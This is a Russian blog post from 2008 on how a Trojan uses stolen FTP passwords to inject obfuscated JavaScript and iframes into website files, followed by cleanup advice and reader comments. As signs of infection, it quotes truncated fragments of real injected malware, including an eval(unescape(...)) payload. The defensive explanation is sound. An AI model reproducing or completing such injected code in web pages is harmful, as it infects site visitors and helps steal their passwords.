августа 27, 2008

Как заразить вирусом свой собственный вебсайт

Эта статья адресована в первую очередь всем владельцам собственных вебсайтов. Возможно, вы уже сталкивались с враждебным вторжением, а может быть, вам это еще только предстоит. Но в любом случае далеко не всегда виноватым является хостинг. В последнее время участились случаи внедрения вредоносного кода в HTML и PHP страницы, а также в файл .htaccess. Как это проявляется?
  • При доступе к своему сайту вы можете получать сообщения об ошибках php, если там применяются скрипты или используется какой-либо движок на PHP (wordpress, joomla).
  • Обычные HTML страницы могут быть искажены или доступ к ним ограничен либо полностью отсутствовать.
  • Возможно появление ошибки выполнения скриптов 500 при заражении .htaccess.
  • Сообщение антивирусных программ о заражении при открытии своих сайтов.
  • Что-либо другое, не соответствующее нормальной работе вебсайта.

Что все это значит и как проверяется?

При просмотре исходного кода вебстраниц вначале или в самом конце присутствует загадочный код как правило в виде кодированного javascript. Скажем вот такого вида (приводится не полностью):
<script>function vyVdxyxdaYY(vyatVYybYVy){ var vYdbddxaVaV=530;
return(parseInt(vyatVYybYVy,16));}function vayatyaVatd(vVayxytttdy)
{ var vdxxaxdaYVy=530; var vtVbxYytbYa='';
for(vYbbbaxVbYx=0; vYbbbaxVbYx<vvayxytttdy.length;>...
или
<!-- [ ab2aab4b9d766629b77b9b4febadeb6f ] --><script>eval
(unescape('function%20crZnLPY%28uTm%29%7Bfunction%20sPWGz%28unYS%29%7
Bvar%20fUrEeI%3D0%2CvEImT%2CtKGn%3DunYS.
length%3Bfor%28vEImT%3D0%3BvEImT%3CtKGn%3BvEImT++%29fUrEeI+%3DunYS.
charCodeAt%28vEImT%29*tKGn%3Breturn%20new%20String%28fUrEeI%29%7DuTm%3
Dunescape%28uTm%29%3Bvar%20uneE%3Deval%28%27ajrdgMu%
3Amje%3Fn%3Ft%3Fs%3F.%3Fcda%3Fldlde%3Fe%3A%27.
replace%28/%5BM%5C%3Fdj%5C%3A%5D/g%2C%20%27%27%29%29.toString ...
Это самый достоверный признак заражения вредоносным кодом. При посещении вашей страницы при помощи Internet Explorer (как правило) компьютер пользователя заражается трояном и цепная реакция продолжается. Вирус ищет новые лазейки для распространения при этом собирая пароли.

Кто посмел это сделать и как его найти?

В 99% случаев источником данного заражения собственных вебсайтов являетесь вы! Ваш компьютер с Windows уже заражен трояном, который, используя пароли доступа по FTP к вашим вебсайтам, без вашего ведома проникает на них и заражает файлы в корневой публичной папке. По последним данным заражению могут подвергаться и вложенные папки до нескольких уровней вложения. Заражаются файлы HTML, PHP, .htaccess. Самые последние вирусы могут изменять расширения HTML файлов на .htm. Код дописывается в конец файла. И при загрузке страницы запускает iframe. И цепочка продолжается.

Что делать и как быть?

  1. Проверить компьютер на предмет наличия вирусов и делать это систематически, регулярно обновляя вирусные базы.
  2. Проверить компьютер на трояны и spyware, если антивирус этого не позволяет.
  3. Сменить пароль на доступ к серверу.
  4. Отменить сохранение пароля в FTP-менеджерах, которыми вы пользуетесь как администратор FTP-сервера (Total Commander, Far, и т.п.) - т.е вводить пароли вручную.
  5. Регулярно проводить архивирование незараженных вебсайтов.
Единственный способ лечения это скачивание вебсайта (при отсутствии локальной копии) и ручное удаление вредоносного кода. Либо выгрузка чистой сохраненной версии.

Небольшой совет профессионалов: ftp пароли можно сохранять с дописанным одним символом и при запросе пароля его просто удалять.

При соблюдении указанных действий появление новых заражений прекращается.

8 комментариев:

  1. самое ужасное - это внедрение чисто компьютерных вирусов не в сайт, а в мозг, в том числе - в спинной, в подсознание. Вот, Владик, в тебя внедрились 2 вирусных слова:
    1) вредоносный код
    2) совет профессионалов
    Ты сейчас запротестуешь, что это не вирусы. Этот твой протест - очень характерен, он только, к сожалению, подтверждает вышесказанное...
    Контрреволюция - чёрт знает: что это такое?

    ОтветитьУдалить
  2. Это какой-то странный комментарий. Некомпьютерный он. Смахивает на личное сообщение.

    ОтветитьУдалить
  3. а что, провессионалы употребляют выражение "вредоносный код"? и кто они, эти профессионалы? как, в таком случае, распознать профессионала?

    ОтветитьУдалить
  4. Употребляют еще хуже - злобный код - http://en.wikipedia.org/wiki/Malware.

    Профессионал это тот, кто делает что-то за деньги.

    ОтветитьУдалить
  5. ВАЖНОЕ ДОПОЛНЕНИЕ:
    вирус поражает и файлы изображений!
    В частности обнаружены пострадавшие файлы GIF.

    Бережёного Бог бережёт.

    ОтветитьУдалить
  6. У меня не отображаются плагины в админке и на "морде" исчезли (менюшки и прочее)... Кто-нить знает в чем дело, может помочь ? Уже несколько дней пояыляются сообщения об обновлении плагинов, но как захожу в плагины - их как0будто нет, да и админка стала как бы нулёвой - как будто только что поставил, хотя настроек много было...

    Если кто знает, выложите, пожалуйста у себя в блоге что делать... :)

    ОтветитьУдалить
  7. Экстрасены отдыхают, товарищ. Статья гуд

    ОтветитьУдалить

Комментирование запрещено.

Примечание. Отправлять комментарии могут только участники этого блога.